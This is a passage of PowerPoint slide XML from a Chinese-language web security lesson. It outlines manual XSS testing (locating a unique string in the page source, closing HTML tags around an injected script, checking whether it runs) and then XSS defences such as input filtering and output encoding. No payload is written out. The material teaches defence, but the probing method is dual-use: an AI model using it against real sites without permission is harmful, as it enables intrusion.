                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>输入一个“唯一”字符，单击提交后，查看当前状态下的源码文件。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="455"/>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）通过搜索定位到唯一字符，结合唯一字符前后的语法构造</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，并合理的 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>标签进行闭合。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="151130" marR="36830" indent="-139065">
              <a:lnSpc>
                <a:spcPts val="810"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="430"/>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4</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）提交构造的</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，看是否可以成功执行，如果成功执行则说明存在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>漏 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="700" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>洞。</a:t>
            </a:r>
            <a:endParaRPr sz="700">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>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6</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28097" y="621993"/>
            <a:ext cx="669925" cy="245110"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="20">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1400" spc="40">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>防御</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="728097" y="868836"/>
            <a:ext cx="3367404" cy="113664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15875" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="138430" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="139065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>跨站漏洞最终形成的原因是对输入与输出没有严格过</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>滤</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、在页面执</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="30">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>行</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等客户端脚</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>本</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>，如</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="854078" y="933608"/>
            <a:ext cx="3262629" cy="113664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="15875" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="125"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>果要防御</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>就意味着只要将敏感字符过滤</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>即可修补</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>跨站漏洞。下面将介绍几种</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>过滤方法供读</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="715404" y="966492"/>
            <a:ext cx="516890" cy="264795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="47625" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" marR="66675">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>者选</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>择</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marL="139065" marR="5080" indent="-139065">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="280"/>
              </a:spcBef>
              <a:buChar char="■"/>
              <a:tabLst>
                <a:tab pos="139065" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="25">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>通用处理</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="object 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906660" y="1210633"/>
            <a:ext cx="3209925" cy="118745"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="15">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="160">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-15" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对存在跨站漏洞的页面参数的输入内容进行检</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-35" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>查</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>、过滤。例如</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-20" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>%!~@#$^*()=|{}\\&lt;&gt;/?</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="30" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr sz="550">
              <a:latin typeface="Franklin Gothic Book"/>
              <a:cs typeface="Franklin Gothic Book"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="object 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="906658" y="1275393"/>
            <a:ext cx="2543175" cy="892175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="13335" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r" marR="1506855">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>等符号的输入进行检查过滤</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" marL="138430" marR="1537335" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
              <a:buSzPct val="91666"/>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="138430" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>）对页面输出进行编码</a:t>
            </a:r>
            <a:endParaRPr sz="600">
              <a:latin typeface="华文楷体"/>
              <a:cs typeface="华文楷体"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HtmlEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>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a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="45"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HtmlAttributeEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="10" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>属性中使用的输入字符串编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a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="151130" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScriptEncode</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>将在</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="550" spc="5" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="Franklin Gothic Book"/>
                <a:cs typeface="Franklin Gothic Book"/>
              </a:rPr>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="600" spc="-25" i="1">
                <a:solidFill>
                  <a:srgbClr val="191B0E"/>
                </a:solidFill>
                <a:latin typeface="华文楷体"/>
                <a:cs typeface="华文楷体"/>
              </a:rPr>
              <a:t>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a:p>
            <a:pPr marL="150495" indent="-138430">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="40"/>
              </a:spcBef>
              <a:buFont typeface="Franklin Gothic Book"/>
